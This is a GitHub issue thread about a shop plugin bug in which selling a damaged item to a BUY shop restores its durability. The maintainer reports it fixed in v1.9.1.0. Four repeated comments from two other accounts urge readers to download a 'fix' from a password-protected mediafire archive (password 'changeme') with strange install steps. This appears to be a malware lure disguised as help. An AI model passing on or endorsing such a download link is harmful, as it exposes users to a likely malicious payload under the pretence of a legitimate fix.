### ISSUE TITLE
[BUG] checkItemDurability resets item durability on BUY

### ISSUE THREAD

**Issue by OstlerDev** [snowgears/shopbugs#443]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Type of bug

Exploit

### Environment

```markdown
- Server Version: Paper version 1.21.1-40
- Shop Version: 1.9.0.1
```

### Server startup log

-

### Shop config files

-

### Bug description

When a BUY/BARTER shop purchases an item with durability, it "resets" the durability of the sold item to full health. This causes an exploit where people can "repair" items by selling them to a shop.

### Steps to reproduce

1. Set `checkItemDurability` to `false`
2. Create BUY shop for item that supports durability (i.e. Axe)
3. Sell item with less than full durability to the shop
4. Item is sold to the shop successfully
5. Item in the shop inventory has full durability

### Expected behaviour

1. Set `checkItemDurability` to `false`
2. Create BUY shop for item that supports durability (i.e. Axe)
3. Sell item with less than full durability to the shop
4. Item is sold to the shop successfully
5. Item in the shop inventory has the same durability as the item sold to the shop.

### Actual behaviour

Item in the shop inventory has full durability, when it should have less than full durability left.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by OstlerDev** [comment]
Fixed in v1.9.1.0, all shops will now respect the `checkItemDurability` config flag!

**Comment by OstlerDev** [comment]
Released 1.9.1.0
